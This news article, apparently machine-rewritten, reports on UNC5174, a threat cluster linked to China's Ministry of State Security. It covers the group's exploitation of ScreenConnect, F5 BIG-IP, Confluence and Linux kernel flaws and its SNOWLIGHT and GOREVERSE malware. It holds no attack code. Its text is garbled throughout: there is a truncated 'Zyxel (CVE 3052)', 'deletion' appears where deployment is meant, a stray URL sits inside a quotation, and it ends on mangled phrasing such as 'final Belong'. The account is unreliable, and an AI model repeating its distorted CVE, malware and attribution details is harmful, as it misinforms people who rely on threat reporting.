A China-related threat cluster exploits security flaws in Connectwise ScreenConnect and F5 BIG-IP software to deliver custom malware capable of delivering additional backdoors on infected Linux hosts as part of an “offensive” campaign .
Google-owned Mandiant is tracking activity under its unclassified name UNC5174 (also known as Uteus or Uetus), describes it as “a former member of a Chinese hacktivist group that has since been shown to be acting as a contractor for China’s Ministry of State Security (MSS) focused on performing access operations.”
The threat actor is believed to have orchestrated attacks targeting Southeast Asian and US research and education institutions, Hong Kong businesses, charities and non-governmental organizations (NGOs) between October and November 2023, and again in February. Widespread attack using ScreenConnect bug in 2024.
By exploiting Atlassian Confluence (CVE-2023-22518), ConnectWise ScreenConnect (CVE-2024-1709), F5 BIG-IP (CVE-2023-46747), Linux Kernel (CVE-2022-0185), and Zyxel (CVE 3052) .
After successfully establishing a foothold, extensive reconnaissance and scanning of Internet-facing systems is performed to find security vulnerabilities. UNC5174 also creates administrative user accounts to perform malicious actions with elevated privileges, including deletion of a C-based ELF downloader named SNOWLIGHT.
SNOWLIGHT is designed to download the next stage payload, an obfuscated Golang backdoor called GOREVERSE, from a remote URL related to SUPERSHELL, an open source command and control (C2) framework that allows attackers to establish reverse SSH tunnels and Start an interactive shell session to execute arbitrary code.
Threat actors also use the Golang-based tunneling tool GOHEAVY, which may be used to facilitate lateral movement within infected networks, as well as other programs such as afrog, DirBuster, Metasploit, Sliver, and sqlmap.
In an unusual instance uncovered by a threat intelligence firm, threat actors were found to have applied mitigations for CVE-2023-46747, possibly in an attempt to prevent other unrelated adversaries from weaponizing the same vulnerability to gain access.
Mandiant Assessment: “UNC5174 (aka Uteus) was a member of the Chinese hacker group ‘Dawn Calvary’ and has worked with ‘Genesis Day’ https://thehackernews.com/ ‘Xiaoqiying’ and ‘Teng Snake’.” “This Individuals appear to have left these organizations in mid-2023 and have since been focused on performing access operations with the goal of proxying access to compromised environments.”
There is evidence that the threat actors may have been the initial access broker and were supported by MSS, as they claimed on dark web forums. This is confirmed by the fact that a number of US defense and UK government entities were simultaneously targeted by another access broker named UNC302.
These findings once again highlight the ongoing efforts of Chinese nation-state groups to compromise edge devices by rapidly incorporating recently disclosed vulnerabilities into their arsenal in order to conduct cyber espionage at scale.
“UNC5174 was observed attempting to sell access to US defense contractor equipment, UK government entities, and Asian agencies in late 2023 after exploiting CVE-2023-46747,” Mandiant researchers said.
“There are similarities between UNC5174 and UNC302, which suggests they are operating within the MSS initial access agent environment. These similarities suggest there may be shared vulnerabilities and operational priorities between these threat actors, although further investigation is required to determine the final Belong.”
The disclosure came as the Ministry of State Security warned that an unnamed foreign hacker group had used phishing emails and known security flaws to breach networks and infiltrate “hundreds” of Chinese businesses and government organizations. It did not reveal the name or origin of the threat actor.
